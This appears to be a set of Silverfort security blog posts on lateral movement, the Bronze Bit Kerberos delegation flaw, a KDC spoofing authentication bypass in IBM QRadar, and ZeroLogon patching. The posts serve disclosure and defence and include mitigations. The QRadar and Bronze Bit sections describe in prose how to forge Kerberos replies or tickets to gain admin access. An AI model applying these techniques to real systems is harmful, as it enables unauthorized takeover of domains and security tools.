Initial Access Protection It’s always important to apply additional defenses, in case the attackers are persistent and resourceful enough to succeed with another Initial Access technique. In that case, Silverfort would block the next stage of Lateral Movement, by enforcing MFA on the PSexec remote authentications (on which the automated ransomware propagation relied): Initial Access established Persistence via configuration of compromised machine as C2C server Lateral Movement via Psexec is blocked by Silverfort MFA policy on PSexec Diagram 4: Pay2Key Attack Example #1 Lateral Movement Protection In a similar manner, Silverfort would have prevented both the Initial Access and Lateral Movement stages of the Pay2Key attack example #2. The RDP part is identical, so let’s move to the part in which we consider that the attacker did manage somehow to establish a footprint on one machine within the environment. There are some aspects in the Lateral Movement part that are worth focusing on: Initial Access established Lateral Movement via Powershell scripts is blocked by Silverfort MFA policy on Powershell Remoting Persistence and Data Exfiltration via backdoor - only on the initially accessed server Diagram 5: Pay2Key Attack Example #2 Lateral Movement Protection In this case Silverfort prevents the Lateral Movement by applying MFA on remote Powershell connections, ensuring only legitimate valid users are executing it and limiting the attack to the single machine that was initially compromised. Final Thoughts As we’ve stated in the beginning of this article, the Pay2Key attacks are not unique in any manner. But it is exactly the lack of uniqueness that should raise a flag to security teams worldwide – the common attacks, rather than the unique ones are the ones that are likely to target your environment and it is imperative to protect against them. In today’s enterprise Identities are the keys to the kingdom’s crown jewels. Silverfort Unified Identity Protection platform is the first to provides your users’ identities the protection they really need. Learn more on Silverfort here --- - Published: 2020-12-24 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-revolutionizes-protection-against-lateral-movement-with-mfa/ *****By https://www. silverfort. com/wp-content/uploads/2022/06/Thumbnails-for-Resources-and-blog-green_0001s_0001_Generic1-Archive-card-842x626px-24. png Keshet, Director of Product Marketing, Silverfort ***** MFA prevents 99. 9% of account compromise. However, this extremely efficient security measure is currently unapplicable to core enterprise resources, first and foremost the on-prem endpoints and servers. The recent SolarWinds attack showcases once again that protection against Lateral Movement is among the weakest points in today’s security stack. Silverfort revolutionizes protection against Lateral Movement by introducing MFA to the endpoints and servers’ access in the on-prem environment, proactively preventing existing lateral movement techniques such as those used by the SolarWinds threat actors. Lateral Movement in the SolarWinds Attack Overview The Lateral Movement part in the SolarWinds attack followed suit with well-known patterns: after the initial compromise, the attackers started the credential hunt which ultimately ended with obtaining admin credentials and login to the actual target (in this case the ADFS server). The logons to the various machines along the path were apparently carried out with remote access command line tools (PSexec, Powershell, etc. ). Lateral Movement Protection is Broken It’s worth mentioning that the Initial Access part of the SolarWinds attack featured extreme innovation, sophistication and creativity. That is not the case with the Lateral Movement part – however is didn’t make it less effective. The sad truth is that Lateral Movement techniques and tactics haven’t changed much since a decade ago, simply because they didn’t have to – from the attackers’ perspective there is no need to change something that works great. And unfortunately, in this case they are right. The enterprise’s security stack repeatedly fails against Lateral Movement. This is because in essence, Lateral Movement at is no more than logging to machines with valid (though compromised) credentials. The existing security controls, whether placed directly on the endpoint or monitoring the network traffic might at best detect that an anomalous login has occurred and raise an alert. However, they cannot actually do anything in real-time to prevent the login from actually happening – which in most cases will be far too late. The key to preventing Lateral Movement is to understand the actual meaning of what we’ve just said: Lateral Movement is no more than logging into machines using valid credentials. In other words, it’s an unsecured authentication we need to mitigate - and there is a purpose-built technology to thwart a scenario in which a threat actor attempts to access enterprise resources with valid credentials – Multi Factor Authentication. MFA is not Available against Lateral Movement One of the few consensus points among security practitioners is the enormous value MFA provides. According to Microsoft, MFA in place prevents 99. 9% of account compromise. However, the Active Directory based endpoints and servers, which are primary targets for Lateral Movement, are excluded from the protection MFA brings. There is today no available technology that can enforce MFA on the remote access command line tools attackers use to move laterally between machines. MFA is the most effective and proven technology to prevent malicious logins. Its absence from logins in the on-prem environment is what enables lateral Movement to prosper as we’ve seen in numerous APTs, including the latest SolarWinds attack. But What If... ? However, MFA can easily turn the tables on the attackers. With an MFA in place, when the attacker provides the login credentials to the new machine, the actual user to which these credentials belong receives a notification to his phone or desktop. The notification would ask whether to allow or deny access to the machine and the request would ultimately be denied because the actual user never performed this login attempt – and the attacker wouldn’t be able to access the machine. Arm your On-Prem Environment Against Lateral Movement with Silverfort  Silverfort Unified Identity Protection Platform (UIPP) pioneers the extension of MFA across all of the enterprise resources, including resources and access methods. Silverfort is the first to introduce the enforcement of MFA access policy on accessing on-prem endpoints and servers via remote command line tools. A simple policy that require MFA verification whenever a domain admin logs in using a remote access command line tool would radically reduce any Lateral Movements’ success rates. This would apply even in a SolarWinds attack scenario where the attackers have managed to put their hands on an admin’s credentials. While the attackers indeed have the credentials, they won’t be able to use the to perform the actual login to the resources they target. Final Thoughts How come the absence of MFA from the on-prem environment was taken for granted all this time? This absence is so deeply rooted in the common mindset that most to all security practitioners, hands-on and executives alike probably don’t even regard it as a security gap but rather as a reality we have to live with. Silverfort is here to change this reality. Learn more on Silverfort here (function(i,s,o,g,r,a,m){i=r;i=i||function{ (i. q=i. q||). push(arguments)},i. l=1*new Date;a=s. createElement(o), m=s. getElementsByTagName(o);a. async=1;a. src=g;m. parentNode. insertBefore(a,m) })(window,document,'script','https://scout-cdn. salesloft. com/sl. js','slscout'); slscout; --- - Published: 2020-12-14 - Modified: 2025-04-03 - URL: https://www.silverfort.com/blog/silverfort-bronze-bit-cve-2020-17049/ On December 8, the new Bronze Bit exploit of CVE-2020-17049 Kerberos vulnerability was made public, adding another cutting-edge weapon to attackers’ post-compromise arsenal. While the full fix of this vulnerability will not be enforced before February 8 2021, Silverfort’s Unified Identity Protection Platform delivers full protection against the Bronze Bit attack . Through its unique ability to enforce MFA and adaptive access controls on Active Directory authentication protocols, Silverfort introduces a new paradigm on defense against lateral movement attacks in Active Directory environments. A detailed analysis of the delegation types, CVE-2020-17049 and the Microsoft patch was performed by Silverfort's Security Researcher - Dor Segal and it's available here. The Journey Towards Secure Delegation CVE-2020-17049 enables an attacker to bypass the Resource Constrained Delegation authentication security control. In general, Delegation refers to the ability of Active Directory account to impersonate, or act on behalf of another account, in order to access resources with the other account’s access privileges. A common example is when a user accesses a web application: While it seems that the user accesses the web application directly, what happens in the backend is that the user account delegates its access privileges to a service account which impersonates the user and accesses the app database on the user’s behalf. From a security perspective, the concern is what happens if this mechanism is abused by an attacker. The first Delegation mechanism that was offered in AD, also known as Unconstrained Delegation, introduced a significant risk since it enabled the impersonating service to access all the resources the delegating account could access. This concern led to gradual evolution of delegation over the years as shown in this table: As can be seen clearly in the table, each generation reduces the risk by materially decreasing the number of delegating accounts, impersonating services and accessible resources. While the scenario of an attacker performing malicious delegation is still possible, its implications in terms of resource access are significantly narrowed. Resource-Constrained Delegation are the most secure delegation type therefore they are currently the standard that’s used in most Active Directory environments. Now that we have gained insight into Delegation, we can understand the impact of the Bronze Bit exploit. The Bronze Bit Attack – Impairing Delegation Security Controls The Bronze Bit attack makes use of CVE-2020-17049 vulnerability to enable an attacker to perform the following (extracted and edited from its author’s blog): ‘An attacker can impersonate users which are not allowed to be delegated. This includes members of the Protected Users group and any other users explicitly configured as “sensitive and cannot be delegated” So, this attack takes us back in terms of risk exposure, increasing the attack surface to practically all user account within the environment. Microsoft CVE-2020-17049 Mitigation Activities Microsoft released a patch for this vulnerability as part of the November 8th Patch Tuesday. However, due to various Kerberos authentication issues a new patch was made available on December 8th. This patch provides enterprises protection against the exploitation of the vulnerability until the full enforcement of the Kerberos protocol fix, which will take place on February 8, 2021. Given the typical difficulties entailed in server security patching in general and Domain Controllers specifically, it’s likely that despite the availability of the patches, not everyone deploys them immediately. So, there is currently a significant risk exposure for these organizations. Silverfort Protection against Delegation Based Attacks Silverfort Unified Identity Protection Platform is the only solution that consolidates monitoring, risk analysis and access policy enforcement for all user and service account authentications across all corporate networks and cloud environments. Due to it’s innovative agentless proxyless technology, Silverfort can extend MFA to a wide range of resources that couldn’t be protected before. This of course includes any authentication that uses the Kerberos protocol. And it’s important to note that when setting up a Silverfort policy for a user, the policy’s security controls apply both to direct as well as delegated authentications performed by the user. Let’s see how this applies to the protection of both delegating and non-delegating user accounts. Protection against the Bronze Bit attack – delegating accounts In practice, delegating accounts (i. e. accounts that are configured to allow delegation) are already protected by default due to Silverfort’s continuous monitoring of Active Directory authentication protocols, which automatically identifies these accounts and factors the delegation into their risk score. Thus, the following risk-based policy would trigger an MFA requirement whenever an anomalous authentication attempt will take place: Whenever such an account’s authentication attempt exceeds medium risk score, an MFA requirement will pop up for the user. If the authentication was made by an attacker performing malicious delegation on behalf of this account, the account owner can block access by confirming that it’s not his request. Protection against the Bronze Bit attack – non delegating accounts But how can we protect the user accounts that are not configured for delegation? The risk-based policy won’t do here, since these accounts don’t include the delegation factor, so a different approach is required. Let’s recap – the scenario we want to mitigate is this: an attacker has compromised a service account – let’s call it account 1. The attacker wants to access a sensitive resource – let’s call it resource 1 – but cannot do it under the access privileges of account 1. With the Bronze Bit exploit the attacker can use account 1 to impersonate a high-privileged account that we will call account 2 that is configured to not allow delegation (for example, any member of the Protected Users group), in order to access resource 1. Account 1 is impersonating account 2 to access resource 1. Behind the scenes, prior to accessing resource 1, account 2 authenticates to account 1 in order to provide user 1 the ability to act on its behalf. Now, account 1 must be a service that is configured to allow impersonation. Since all the services that are configured to do so are already known (after all they were configured by the domain administration team) all we need is the following policy: The ‘Non-Delegating Accounts’ stands for all user accounts configured to not delegate, while the ‘Impersonating Service Accounts’ represent all the service accounts that are configured to allow impersonation. Alternatively, If we would want to deny delegation only and still access the resource, they could use the “Source” field to limit only the delegation access. In this case we recommend to assign ‘Deny’ as the protective action: Since these accounts should never interact with delegating service accounts, no operational disruption should occur. This protection totally impairs the Bronze Bit attack. Even if the attacker managed to force a high privileged account to attempt delegation, Silverfort will prevent its actual engagement with an impersonating service account. Silverfort protection against the Bronze Kit exploit demonstrates once again how applying adaptive access control to Active Directory authentication protocols, and specifically to the remote access command line tools attackers would use to launch the Bronze Kit attack, is imperative to deliver sufficient protection against lateral movement attacks. Learn more about Silverfort here --- - Published: 2020-12-13 - Modified: 2024-11-19 - URL: https://www.silverfort.com/blog/delegation-treats-cve-2020-17049/ *****By Dor Segal, Security Researcher at Silverfort***** On November 11, 2020 Microsoft disclosed CVE-2020-17049, a new Kerberos Security Feature Bypass vulnerability. While the vulnerability itself will not be fixed before February 8th 2021, Microsoft has issued patches on November 8th and December 8th in order to mitigate its exploitation in the meantime. Very little was disclosed on the vulnerability’s internal workings, with neither a public POC or a technical analysis. This post attempts to fill some of this gap by shedding a light on Kerberos Delegation in general and deep diving into the patch Microsoft has issued for CVE-2020-17049 KCD vulnerability itself. Kerberos Delegation 101 Kerberos Delegation is one of the most complicated concepts of Kerberos authentication process. This extension over the standard protocol was originally created for providing services, and the service accounts they use, access to resources without actually granting them any kind of permissions. Since its initial introduction, delegation has gone through a couple of important changes until it became the Resource-based Constrained Delegation we use today (aka KCD). So, before we approach the vulnerability itself, let’s review the different types of delegation and their respective pros and cons. Stage 1: Unconstrained delegation Unconstrained delegation was introduced in Windows Server 2000 and was the first to allow services to impersonate a user with access permissions. As the name indicates, this kind of delegation gives a service the power to use the user’s credentials to access any resource at any time. The process requires the user to request a forawardable TGT and attach it to the service ticket. Then, the service takes the TGT and injects it to lsass. exe local cache for later use. Nowadays we know this method is highly risky because it grants unlimited access the delegated services, which in the case compromise - would enable the attacker to harvest all cached tickets and get full access to all their privileges. This kind of delegation still exists today, mostly to support backward compatibility, and can be detected by querying for ADS_UF_TRUSTED_FOR_DELEGATION flag in userAccountControl attribute. This flag is also monitored by Silverfort, which reports on services using unconstrained delegation. Stage 2: Constrained delegation The next generation of delegation is more limited and allows the service to impersonate access only to defined resources with the flag “Account is sensitive and cannot be delegated” on Active Directory to limit specific users from impersonation. This type of delegation is where the service performs authentication using S4U2Self and S4U2Proxy extensions (MS-SFU). So how does it work? Our service account must have the TRUSTED_TO_AUTH_FOR_DELEGATION flag turned on and the ms-AllowedToDelegateTo attribute that includes the resource’s SPN. A user authenticates as usual to the service using kerberos negotiation (TGT & TGS). Now this starts to get complicated: a delegated service account requests a forwardable TGT to itself. We used this ticket to request a service ticket using S4U2SELF using the impersonated username for our cname PA-DATA field. The service takes this ticket, attaches it to the resource service ticket (S4U2Proxy) with the constrained-delegation flag. The received ticket is an impersonation of the current user by our service. Stage 3: Resource-based Constrained Delegation The major difference in this delegation is mostly administrative. Instead of permitting the service to be delegated access to a resources, we give the power to the resource owner to define which service is allowed to perform delegation. This is configurable by PowerShell using the PrincipalsAllowedToDelegateToAccount parameter or simply by editing the attribute msDS-AllowedToActOnBehalfOfOtherIdentity Microsoft Security Patch for CVE-2020-17049 - Technical Analysis Protocol vulnerabilities are always harder to mitigate due to the required backward compatibility support. We started looking at Microsoft’s patch by reading the information published on the official website. We understood that the vulnerability is about “tampering tickets” and it’s located somewhere in the process of Kerberos Constrained Delegation. We chose to simulate delegation on a vulnerable Domain Controller and reproduce it on a patched one to check the difference: The first noticeable change is located at the length of each packet, we can see the self-signed ticket (S4U2Self) request is the same but its response is 40 bytes longer. This also applies to the next S4U2Proxy request and response, so what has changed? A textual comparison wasn’t helpful because the changed text is encrypted inside the ticket. After decrypting the cipher using the service’s keytab, the text is readable but still needs to be understood. Looking at AuthorizationData field we can see a new Unknown field, starts at offset 840 with the size of 20. Where does this new field come from? How does KDC handle it? What I love most about protocols is that most of them have regularly maintained and updated RFCs - and Kerberos is no exception. Visiting MS-SFU noticed it was updated on 11/23/2020. When we opened the Diff document we learned insection 3. 2. 5. 2. 2 that there is a new signature that is used to validate the integrity of the ticket. In addition, Microsoft’s patch hints that the first modified ticket is the S4U2Self. We extracted some more information from the RFC by looking at the reference of Ticket Signature - MS-PAC 2. 8. 3: “The KDC will use KDC (krbtgt) key , so that other KDCs can verify this signature on receiving a PAC. ” “The ticket signature is used to detect tampering of tickets by parties other than the KDC. The ticket signature SHOULD be included in tickets that are not encrypted to the krbtgt account (including the change password service) or to a trust account. ” “corresponding to the ticket signature will contain the value 0x00000010” The MS-PAC RFC unveiled the mystery behind the unknown field in offset 840 - its a new ticket signature, encrypted using the krbtgt key to validate its integrity. Kerberos Bronze Bit On December 8th an implementation of CVE-2020-17049 KCD vulnerability in Kerberos bronze bit attack was released in more detail, shedding some more light about the manipulation of the S4U2Self ticket. The exploit deals with decrypting and editing the bit of the forwardable field inside the encRepPart of ticket. A service with delegation ability can produce S4U2Self tickets to all users even those with ‘Account is sensitive and cannot be delegated’ flag turned on. This flag sets the forwardable flag to False but the ticket never gets validated by KDC in case of modification. Final Words Disclosure of new vulnerability always arouses interest among security researchers. Typically, such disclosure doesn’t involve detailed description of the entailed bits and bytes. While this might make sense from the operational perspective, it’s equally important to leverage such disclosures to get better insights into the software implementation - in this case Kerberos delegation mechanism. If Knowledge is Power, I hope this analysis has made us a bit stronger. --- - Published: 2020-11-25 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/funnydream-apt-campaign-lateral-movement/ *****By https://www. silverfort. com/wp-content/uploads/2022/06/Thumbnails-for-Resources-and-blog-green_0001s_0001_Generic1-Archive-card-842x626px-24. png Keshet, Director of Product Marketing, Silverfort***** A new APT campaign, dubbed ‘FunnyDream’, has been discovered by security researchers. The campaign primarily targeted South East Asian governments. Attack findings have been reported since October 2018. The investigation of the APT group’s espionage activity shows evidence of lateral movement. It seems that compromised credentials were used to execute many batch files with scheduled tasks and WMI on remote machines. Further evidence shows that the attackers used the wmiexec. vbs script to run remote commands. This is a painful reminder that lateral movement is still a blind spot, due to a critical gap in the standard security product stack of most organizations. In this blog we will explain how lateral movement is executed in this attack, and then zoom in on how Silverfort’s innovative technology can block lateral movement altogether, by identifying it’s abnormal authentication patterns and enforcing security policies on command line remote access tools. FunnyDream Campaign Overview The FunnyDream campaign targeted high-profile entities in Malaysia, Taiwan, the Philippines and Vietnam. It features a highly sophisticated custom-made persistence mechanism using advanced backdoors and droppers to facilitate silent and long term data collection and exfiltration. Following the initial infection, and implementation of the persistence mechanism, evidence suggests that the FunnyDream threat actors seek and succeed in compromising their victims’ domain controllers. They then executed extensive lateral movement activity using scheduled tasks and WMI , with special preference for using wmiexec. vbs to explore and execute code on remote machines. Lateral Movement: Legitimate by Design, Malicious by Context Lateral movement, as seen in APT campaigns such as FunnyDream, can be executed using legitimate remote admin tools such as PSexec, Powershell or in the case of FunnyDream WMI, to explore and access resources in the network. These tools eliminate the need to discover zero day vulnerabilities, develop exploits, or craft a complicated backdoor, since these admin tools are purposely built to enable network and infrastructure operators to seamlessly access any remote machine. In other words, these tools are by design both incredible productivity drivers as well as lethal blades in the hands of attackers. Lateral Movement Presents Challenges to Security Products There are two reasons why lateral movement is difficult to detect and prevent with common security solutions: • The attack is performed using legitimate, yet compromised, credentials: this means that, in practice, what you see is merely a login with valid user credentials. There is no explicit indication that the credentials used are in fact compromised. • Real time detection of abnormal behavior is difficult due to the complexity of these attacks: Some solutions like EDR, NDR, and SIEM, can detect a potential anomaly after lateral movement has occurred, and generate a retroactive alert. However, since they don’t detect it in real-time, they can’t block it. To better illustrate the point – malicious activity, by definition, deviates from legitimate activity. For example, in the case of malware or exploits, it’s a deviation from the standard behavior of a process followed by its immediate termination by the endpoint protection. In the case of mass data exfiltration it’s a deviation from the standard patterns of network traffic which, once detected, triggers immediate blocking by the network protection product. And so on. However, when using legitimate credentials to access resources, the deviation would be seen only in the user’s activity. And, if an anomaly in the user’s activity is detected, it should be followed by an immediate response – either block the user’s access, or requiring the user to reauthenticate in order to verify the true identity of the user. This is where Silverfort comes into play. Silverfort: The First Unified Identity Platform Silverfort is the first Unified Identity Protection Platform that was purpose built to secure organizations against identity-based attacks, that use compromised credentials to access targeted resources. Silverfort integrates with your IAM infrastructure to monitor all the authentication activity in the network, to both to cloud and to on-prem resources, for continuous risk analysis and access policy enforcement. Paradigm Shift: Block Lateral Movement by Stepping Up Authentication Requirements in Real Time Silverfort’s holistic visibility into the entire authentication activity of each user enables it to evaluate with unmatched precision the behavior profile of your users. It continuously calculates the risk of each access request compared to the observed behavior of the user and its community. To read more about this see the blog: Detecting and Predicting Malicious Access in Enterprise Networks Using the Louvain Community Detection Algorithm When Silverfort identifies abnormal activity, as happens with lateral movement attacks, it can step up the authentication requirements in real-time to block access, or require the user to authenticate with an MFA of choice (it can be Silverfort’s agentless MFA solution or a 3rd party MFA solution). Silverfort is the only solution that is capable of enforcing MFA on the command line remote access tools that are the bread and butter of lateral movement. While traditionally MFA is not considered a native part of the counter-APT arsenal in the post-compromise lateral movement stage, applying it to such command line tools in combination with adaptive risk policies, provides simple yet effective protection against these threats. How Does it Work? Let’s illustrate this using the ‘FunnyDream’ lateral movement example: 1. The attacker attempts to log in to a machine with wmiexec. vbs, using compromised user credentials. 2. The Silverfort recommended policy for the use of WMI for remote access requires MFA. Hence, the actual user, the legitimate user who owns the credentials, is prompted to verify the authentication. 3. The attacker can’t complete the authentication so access to the resource is blocked. 4. The SOC is immediately notified by Silverfort about the attempt to use wmiexec. vbs allowing the security team to further investigate and eradicate the malicious presence from their network. To learn more about Silverfort's ability to block lateral movement attacks please watch our on-demand webinar: Can You Detect and Block the Evasive Threat of Lateral Movement? We hope we managed to explain in this blog how Silverfort mitigates these threats, and blocks lateral movement. However, we're always happy to discuss this further. Let us know if you have any questions or if you'd like to see a full demo of this solution: Request a Demo --- - Published: 2020-10-13 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/third-kdc-spoofing-ibm-qradar-cve-2019-4545/ *****By Yoav Iellin, Yaron Kassner, Dor Segal & Rotem Zach, Silverfort***** KDC spoofing never gets old. We’ve disclosed KDC spoofing vulnerabilities in Cisco ASA and Palo Alto Networks PAN-OS back in May 2020. Now we can share that IBM QRadar is also vulnerable due to the way Kerberos has been implemented. The KDC Spoofing vulnerability allows an attacker to bypass the Kerberos authentication to QRadar and, as a result, gain administrative access to the system. We have been working closely with IBM engineers to help fix this issue, resulting with the recently issued security bulletin . This blog post outlines the vulnerability, explains how to avoid these vulnerabilities as a developer implementing Kerberos and talks about mitigation for organizations using QRadar and other systems using Kerberos. Explaining the Vulnerability IBM QRadar Security Information and Event Management (SIEM) helps security teams detect and prioritize threats across the enterprise, and provides important insights that enable teams to respond quickly to reduce the impact of incidents. The vulnerability lies in IBM’s implementation of the Kerberos protocol. Kerberos is the most common authentication protocol for on-premise authentication. It is widely used in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. IBM uses the Kerberos authentication protocol for authenticating administrative access. Therefore, bypassing Kerberos authentication allows an attacker to gain administrative access to IBM QRadar, view sensitive information and potentially alter logs - without having legitimate credentials. For the Kerberos protocol to work, three things should happen: the user authenticates to the server the server authenticates to the client the KDC authenticates to the server Apparently, KDC authentication to the server is often overlooked. Perhaps because requiring it complicates the configuration requirements. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked the network traffic to authenticate to QRadar with any password, even a wrong one. For Kerberos terminology and background about how a KDC spoofing attack works, see the end of this blog post. How We Discovered the Vulnerability in QRadar Admin access to QRadar should be protected with strong authentication to prevent unauthorized access and system tampering. Using AD authentication is a popular option: When an admin authenticates to QRadar, it uses a number of parameters to authenticate the admin (see below a snapshot of the implementation guide taken from here). First, QRadar requests a TGT from AD. After receiving the TGT, QRadar requests a service ticket for LDAP authentication to the domain controller. If successful, QRadar uses SASL to authenticate with LDAP to the DC. It uses the service ticket to prove the identity of the user. Spoofing Kerberos/SASL authentication Here are the steps an attacker will take to spoof a DC to bypass this kind of authentication. Lets assume that we have the ability to hijack the network communication between QRadar and the DC. In this case, we can create a fake DC with a username identical to the admin’s username and a password of our choice. Then we initiate an authentication to QRadar and use the user and password we chose. QRadar authenticates with Kerberos, and we hijack the Kerberos communication and return an AS_REP that corresponds to the password we chose; and a TGS_REP that consists of a service ticket, encrypted with a service session key of our choice, and a session key of our choice, encrypted with the password that we chose. Since at these phases the only verification that is done on the QRadar side relies on the password we chose, QRadar should not reject the authentication at this point. Now that QRadar received the service ticket, it can initiate an LDAP request to the DC. We will hijack the LDAP traffic as well. We have two options at this point: 1. LDAP is being used without TLS. In this case we can hijack the LDAP traffic. QRadar sends a bind request to the DC with a Kerberos AP_REQ message, which contains the service ticket we have. We can return an AP_REP that is based on the service session key we chose, and QRadar will accept it. 2. LDAPS has been configured. In this case we cannot return an answer on behalf of the DC, because TLS is being used to authenticate the DC, that is assuming the certificate has been configured on the QRadar side. Spoofing Kerberos/SASL/LDAPS Authentication for QRadar Before giving up on option 2, we noticed the following odd behavior. If we configure an IP address as the server URL, authentication still works. Theoretically, authentication with an IP address should not work, because Kerberos does not allow authentication to IP addresses unless a SPN has been explicitly configured. When sending the TGS_REQ, QRadar requests a ticket to ldap/. Since the DC does not have a Service Principal Name (SPN) by that name, it returns a KRB_ERR_S_PRINCIPAL_UNKOWN error. According to the Kerberos protocol, QRadar is supposed to deny the authentication at this point. However, a network capture reveals that an LDAP request is opened even after the error, and immediately reset by QRadar. Then, the user is able to login. We conclude that QRadar considers the authentication as successful even before the completion of the Kerberos application exchange. This can be easily exploited. As attackers, we can send a KRB_ERR_S_PRINCIPAL_UNKOWN right after spoofing the AS_REP, and we can cause QRadar to accept an authentication with a password of our choice. The attack is depicted below. An additional bug in QRadar causes it to request authentication from AD for a user that does not necessarily exists. QRadar has a built-in local admin user. It turns out that when attempting authentication with the admin user, QRadar first tries to authenticate to the DC with Kerberos. This username does not have to exist in AD. This makes the attack easier, because the username is known to the attacker in advance. In addition, this bug could be considered a vulnerability on its own. Regardless of KDC Spoofing, if an attacker can obtain privileges for creating users in AD, e. g. , by taking over a help desk account, the attacker can create a user called admin in AD. Then the attacker can use that user to authenticate to QRadar. Exploitation Now that we knew that the QRadar is vulnerable, we simulated an attack by redirecting the traffic between QRadar and the KDC (in this case a domain controller) on port 88 (the Kerberos port) to our own Windows Server. We set up a fake domain on the windows server and made sure there is a user with the same UPN as the QRadar administrator in the real domain. We configured that user’s password to be “1” in the fake domain. We then tried the following situations: - Regular login (Traffic not diverted) – we managed to login with the administrator’s original password, as expected. When trying the password “1”, the login failed. - Logging in with the traffic diverted to our fake DC – logging in with the administrator’s original password failed but logging in with the password “1” worked. IBM’s Mitigation IBM’s approach to mitigate this vulnerability is simple and secure. Since the exact same functionality of authentication to QRadar can be achieved with LDAPS, the recommended mitigation is to simply switch from Kerberos to LDAPS authentication. After that you should install the patch by IBM. The patch will verify that the authentication is indeed set to LDAPS and fail if you haven’t switched to the LDAPS authentication yet. This is to make sure that your system is secure after the patch. If you have been using Silverfort to secure authentication to your QRadar, you will need to also update the Silverfort policy for QRadar for protecting the LDAPS authentication rather than the Kerberos TGT request. Prevention and Mitigation Mitigation Steps for Security Professionals 1. Switch authenticationin your QRadar from Kerberos to LDAPS 2. Upgrade your QRadar to a fixed version 3. Update your Silverfort policy for QRadar accordingly 4. Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. 5. Use Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets. 6. See developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself. As a Developer We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing: 1. Validate that the implementation of Kerboros requires a password or keytab: To validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file, or a service account password, the application is surely susceptible to KDC spoofing. 2. Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag. 3. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols. 4. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) What’s Next? We’ve discovered another KDC spoofing vulnerability and hope to write about it soon, but not before the vendor publishes a patch. Until then, stay tuned. Background An overview of the Kerberos Protocol The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When the user log ins, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication: 1. Authentication Service (AS) Exchange During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the Master Key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according the master key, which is also available to the KDC. After validation the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT), that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services. 2. Ticket-Granting Service (TGS) Exchange When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. The master key of the server in a Unix-based system is configured in a file called a keytab file. The master key of the server in a member server is derived from the computer account’s password. The TGS Exchange is outlined below. 3. Client/Server Exchange Now the client has everything it needs to authenticate... --- - Published: 2020-09-24 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/zerologon-patching-is-not-enough/ Guidelines and Tools for Protecting Your Environment from CVE-2020-1472 By Yaron Kassner, CTO and Co Founder, Silverfort Secura recently published a whitepaper about one of the worst vulnerabilities that I’ve seen in a while. It’s called ZeroLogon, a. k. a. CVE-2020-1472. The DHS also published an emergency directive to patch affected Windows Servers. And they’re not exaggerating – the vulnerability lets an attacker create a domain admin account, just by sending unauthenticated packets to a domain controller. This means that anyone in the network can take over the entire domain. For those interested in the technical bits and bytes – I highly recommend reading the whitepaper. The described attack is elegant and takes advantage of an inherent vulnerability in the NRPC protocol. It turns out that some people were so interested in this attack, that they developed a full working exploit and published it on GitHub. So, if you haven’t deployed the update yet, stop reading this article and do it now. Come back after you do. As with most vulnerabilities, Microsoft published an advisory, along with a security update. While some may be tempted to install the update and forget about it, the careful reader will notice this comment: “Microsoft is addressing this vulnerability in a phased rollout. ” Yap – it’s not a good thing. A phased rollout means that during the first phase of the roll out your system is still vulnerable. A phased approach had to be taken in this case because the vulnerability is inherent in the NRPC protocol. The patch prevents the attack by enforcing an additional layer of security on top of the protocol – that is Secure RPC. Unfortunately, it is not enough to update the server side, i. e. the DC – because the clients also need to be updated for the protocol to work. Microsoft took care of Windows devices, but it didn’t provide a solution for legacy operating systems that are no longer supported or third party products. This means that enforcing Secure RPC will break these incompatible systems. During the first phase, AD enforces secure RPC for Windows devices, which means the worst form of the attack can be prevented. But other clients may still be vulnerable. We developed a simple tool that iterates over the domain controllers in your domain and checks whether all of them are patched. The tool is based on the original testing tool published by Secura but instead of running on one DC at a time, it will automatically find the DCs and run on all of them. We recommend that you run this tool to make sure none of the DCs in your environment have been missed – one unpatched DC is enough to compromise the entire domain. Download The Github Testing Tool Here Moving to Phase Two In the second phase, AD enforces secure RPC for all computers, including non-windows devices. The second phase will be done automatically on February 2nd, but you can start it earlier, and we recommend that you do. To do that, you should first make sure that you don’t have any clients in the network that rely on non-secure RPC. Microsoft provides audit logs to discover such clients and Silverfort can help as well: You can leverage Silverfort to prepare a report that lists clients that use non-secure RPC. If you don’t have Silverfort, you can start by auditing Microsoft’s event logs. What to do with non-secure RPC clients? Here is my recommendation. First of all, put them into "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy. This does not secure these clients , but it will allow you to move the rest of the devices into the enforcement mode 